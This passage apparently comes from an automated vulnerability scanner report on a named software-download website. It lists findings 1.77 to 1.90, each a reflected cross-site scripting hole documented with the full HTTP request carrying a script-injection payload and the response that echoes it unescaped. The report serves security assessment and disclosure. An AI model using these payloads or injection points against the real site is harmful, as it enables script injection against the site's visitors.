This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.htmldc0f0"><script>alert(1)</script>db92b86c3df HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-c-44-newsgroup-clients-downloads.htmldc0f0"><script>alert(1)</script>db92b86c3df" />
...[SNIP]...

1.77. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2749"><script>alert(1)</script>451987c9093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html?b2749"><script>alert(1)</script>451987c9093=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html?b2749"><script>alert(1)</script>451987c9093=1" />
...[SNIP]...

1.78. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 822b0"><script>alert(1)</script>c828d960a93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-downloads.html822b0"><script>alert(1)</script>c828d960a93 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-downloads.html822b0"><script>alert(1)</script>c828d960a93" />
...[SNIP]...

1.79. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e37"><script>alert(1)</script>5191ca0d343 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroup-downloads.html?18e37"><script>alert(1)</script>5191ca0d343=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroup-downloads.html?18e37"><script>alert(1)</script>5191ca0d343=1" />
...[SNIP]...

1.80. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 568b0"><script>alert(1)</script>8a53e952c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html568b0"><script>alert(1)</script>8a53e952c4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html568b0"><script>alert(1)</script>8a53e952c4" />
...[SNIP]...

1.81. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdf61"><script>alert(1)</script>fa8586d080a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html?bdf61"><script>alert(1)</script>fa8586d080a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html?bdf61"><script>alert(1)</script>fa8586d080a=1" />
...[SNIP]...

1.82. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3ac5"><script>alert(1)</script>c5960a7fdd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroups-downloads.htmlf3ac5"><script>alert(1)</script>c5960a7fdd6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:57 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-downloads.htmlf3ac5"><script>alert(1)</script>c5960a7fdd6" />
...[SNIP]...

1.83. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff596"><script>alert(1)</script>281d8a3753f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsgroups-downloads.html?ff596"><script>alert(1)</script>281d8a3753f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsgroups-downloads.html?ff596"><script>alert(1)</script>281d8a3753f=1" />
...[SNIP]...

1.84. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b459f"><script>alert(1)</script>c9490a838b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.htmlb459f"><script>alert(1)</script>c9490a838b3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:39 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-c-44-newsgroup-clients-downloads.htmlb459f"><script>alert(1)</script>c9490a838b3" />
...[SNIP]...

1.85. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e63"><script>alert(1)</script>0dbe9fe771e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.html?47e63"><script>alert(1)</script>0dbe9fe771e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-c-44-newsgroup-clients-downloads.html?47e63"><script>alert(1)</script>0dbe9fe771e=1" />
...[SNIP]...

1.86. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f09b"><script>alert(1)</script>50aa1ce8d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-downloads.html7f09b"><script>alert(1)</script>50aa1ce8d40 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-downloads.html7f09b"><script>alert(1)</script>50aa1ce8d40" />
...[SNIP]...

1.87. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea4d"><script>alert(1)</script>a510634e8be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsreader-downloads.html?dea4d"><script>alert(1)</script>a510634e8be=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsreader-downloads.html?dea4d"><script>alert(1)</script>a510634e8be=1" />
...[SNIP]...

1.88. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca996"><script>alert(1)</script>a4a17688857 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.htmlca996"><script>alert(1)</script>a4a17688857 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-c-44-newsgroup-clients-downloads.htmlca996"><script>alert(1)</script>a4a17688857" />
...[SNIP]...

1.89. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea43c"><script>alert(1)</script>1d1fba47ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.html?ea43c"><script>alert(1)</script>1d1fba47ba5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-nntp-c-44-newsgroup-clients-downloads.html?ea43c"><script>alert(1)</script>1d1fba47ba5=1" />
...[SNIP]...

1.90. http://www.x64bitdownload.com/64-bit-nntp-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83928"><script>alert(1)</script>a5b455172b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-nntp-downloads.html83928"><script>alert(1)</script>a5b455172b2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87761

